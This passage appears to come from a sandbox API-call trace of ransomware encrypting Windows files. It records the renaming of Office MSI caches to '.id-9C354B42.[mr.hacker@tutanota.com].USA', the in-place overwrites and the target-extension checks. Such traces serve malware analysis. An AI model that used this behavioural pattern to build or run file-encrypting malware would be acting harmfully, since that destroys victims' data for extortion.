(in: hFile=0x160, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xc010a, lpNumberOfBytesWritten=0x350fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fcb0*=0xc010a, lpOverlapped=0x0) returned 1 [0045.546] SetEndOfFile (hFile=0x160) returned 1 [0045.546] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fa70b0 [0045.550] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.550] WriteFile (in: hFile=0x160, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.552] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfe400, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.552] WriteFile (in: hFile=0x160, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.556] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x2bac00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.556] WriteFile (in: hFile=0x160, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.558] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fa70b0 | out: hHeap=0x5d0000) returned 1 [0045.558] CloseHandle (hObject=0x160) returned 1 [0045.559] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0045.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.559] lstrlenW (lpString=".doc") returned 4 [0045.559] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.559] lstrlenW (lpString=".docx") returned 5 [0045.559] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0045.559] lstrlenW (lpString=".pdf") returned 4 [0045.559] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.559] lstrlenW (lpString=".xls") returned 4 [0045.559] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.559] lstrlenW (lpString=".xlsx") returned 5 [0045.559] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0045.559] lstrlenW (lpString=".ppt") returned 4 [0045.559] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.559] lstrlenW (lpString=".zip") returned 4 [0045.559] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.559] lstrlenW (lpString=".rar") returned 4 [0045.559] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.559] lstrlenW (lpString=".bz2") returned 4 [0045.559] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.559] lstrlenW (lpString=".7z") returned 3 [0045.559] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.560] lstrlenW (lpString=".dbf") returned 4 [0045.560] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.560] lstrlenW (lpString=".1cd") returned 4 [0045.560] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.560] lstrlenW (lpString=".jpg") returned 4 [0045.560] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.560] lstrlenW (lpString=".doc") returned 4 [0045.560] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.560] lstrlenW (lpString=".docx") returned 5 [0045.560] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0045.560] lstrlenW (lpString=".pdf") returned 4 [0045.560] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.560] lstrlenW (lpString=".xls") returned 4 [0045.560] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.560] lstrlenW (lpString=".xlsx") returned 5 [0045.560] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0045.560] lstrlenW (lpString=".ppt") returned 4 [0045.560] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.560] lstrlenW (lpString=".zip") returned 4 [0045.560] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.560] lstrlenW (lpString=".rar") returned 4 [0045.560] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.560] lstrlenW (lpString=".bz2") returned 4 [0045.560] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.560] lstrlenW (lpString=".7z") returned 3 [0045.560] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.560] lstrlenW (lpString=".dbf") returned 4 [0045.560] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.561] lstrlenW (lpString=".1cd") returned 4 [0045.561] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.561] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.561] lstrlenW (lpString=".jpg") returned 4 [0045.561] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.561] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0045.561] lstrlenW (lpString="OneNoteMUI.msi") returned 14 [0045.561] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0045.561] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=2503680) returned 1 [0045.561] CloseHandle (hObject=0x160) returned 1 [0045.561] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi")) returned 0x2020 [0045.561] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.561] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0045.562] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0045.562] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0x0) returned 1 [0045.562] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.562] ReadFile (in: hFile=0x160, lpBuffer=0x3cd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3cd0058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.944] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.945] ReadFile (in: hFile=0x160, lpBuffer=0x3d10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d10058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.952] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.953] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.953] ReadFile (in: hFile=0x160, lpBuffer=0x3d50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d50058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.974] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.974] WriteFile (in: hFile=0x160, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x350fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0045.992] SetEndOfFile (hFile=0x160) returned 1 [0045.992] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3ff70c0 [0045.996] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.996] WriteFile (in: hFile=0x160, lpBuffer=0x3ff70c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ff70c0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.997] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.997] WriteFile (in: hFile=0x160, lpBuffer=0x3ff70c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ff70c0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.003] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.003] WriteFile (in: hFile=0x160, lpBuffer=0x3ff70c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ff70c0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.006] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3ff70c0 | out: hHeap=0x5d0000) returned 1 [0046.006] CloseHandle (hObject=0x160) returned 1 [0046.006] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0046.006] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.006] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.006] lstrlenW (lpString=".doc") returned 4 [0046.006] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0046.006] lstrlenW (lpString=".docx") returned 5 [0046.006] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0046.006] lstrlenW (lpString=".pdf") returned 4 [0046.006] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0046.007] lstrlenW (lpString=".xls") returned 4 [0046.007] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0046.007] lstrlenW (lpString=".xlsx") returned 5 [0046.007] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0046.007] lstrlenW (lpString=".ppt") returned 4 [0046.007] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0046.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.007] lstrlenW (lpString=".zip") returned 4 [0046.007] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0046.007] lstrlenW (lpString=".rar") returned 4 [0046.007] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0046.007] lstrlenW (lpString=".bz2") returned 4 [0046.007] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0046.007] lstrlenW (lpString=".7z") returned 3 [0046.007] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0046.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.007] lstrlenW (lpString=".dbf") returned 4 [0046.007] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.007] lstrlenW (lpString=".1cd") returned 4 [0046.007] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.007] lstrlenW (lpString=".jpg") returned 4 [0046.007] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.007] lstrlenW (lpString=".doc") returned 4 [0046.007] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0046.007] lstrlenW (lpString=".docx") returned 5 [0046.007] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0046.007] lstrlenW (lpString=".pdf") returned 4 [0046.007] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0046.007] lstrlenW (lpString=".xls") returned 4 [0046.007] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0046.007] lstrlenW (lpString=".xlsx") returned 5 [0046.008] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0046.008] lstrlenW (lpString=".ppt") returned 4 [0046.008] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0046.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.008] lstrlenW (lpString=".zip") returned 4 [0046.008] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0046.008] lstrlenW (lpString=".rar") returned 4 [0046.008] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0046.008] lstrlenW (lpString=".bz2") returned 4 [0046.008] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0046.008] lstrlenW (lpString=".7z") returned 3 [0046.008] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0046.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.008] lstrlenW (lpString=".dbf") returned 4 [0046.008] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.008] lstrlenW (lpString=".1cd") returned 4 [0046.008] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.008] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0046.008] lstrlenW (lpString=".jpg") returned 4 [0046.008] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.008] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0046.008] lstrlenW (lpString="ProjectMUI.msi") returned 14 [0046.008] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0046.117] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=2511872) returned 1 [0046.117] CloseHandle (hObject=0x1f4) returned 1 [0046.118] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi")) returned 0x2020 [0046.118] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.118] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0046.118] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0046.118] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0x0) returned 1 [0046.118] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.118] ReadFile (in: hFile=0x1f4, lpBuffer=0x3cd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3cd0058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.162] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xcc6aa, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.162] ReadFile (in: hFile=0x1f4, lpBuffer=0x3d10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d10058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.171] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0046.171] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x225400, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.171] ReadFile (in: hFile=0x1f4, lpBuffer=0x3d50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d50058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.390] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.391] WriteFile (in: hFile=0x1f4, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x350fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0046.409] SetEndOfFile (hFile=0x1f4) returned 1 [0046.409] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fb70b8 [0046.409] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.409] WriteFile (in: hFile=0x1f4, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.675] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xcc6aa, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.675] WriteFile (in: hFile=0x1f4, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.681] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x225400, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.681] WriteFile (in: hFile=0x1f4, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.684] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fb70b8 | out: hHeap=0x5d0000) returned 1 [0046.687] CloseHandle (hObject=0x1f4) returned 1 [0046.687] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0046.688] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.688] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.688] lstrlenW (lpString=".doc") returned 4 [0046.688] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0046.688] lstrlenW (lpString=".docx") returned 5 [0046.688] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0046.688] lstrlenW (lpString=".pdf") returned 4 [0046.688] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0046.688] lstrlenW (lpString=".xls") returned 4 [0046.688] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0046.688] lstrlenW (lpString=".xlsx") returned 5 [0046.688] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0046.688] lstrlenW (lpString=".ppt") returned 4 [0046.688] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0046.688] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.688] lstrlenW (lpString=".zip") returned 4 [0046.688] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0046.688] lstrlenW (lpString=".rar") returned 4 [0046.688] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0046.688] lstrlenW (lpString=".bz2") returned 4 [0046.688] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0046.688] lstrlenW (lpString=".7z") returned 3 [0046.688] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0046.688] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.688] lstrlenW (lpString=".dbf") returned 4 [0046.688] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.688] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.688] lstrlenW (lpString=".1cd") returned 4 [0046.688] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.688] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.688] lstrlenW (lpString=".jpg") returned 4 [0046.688] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.688] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.688] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 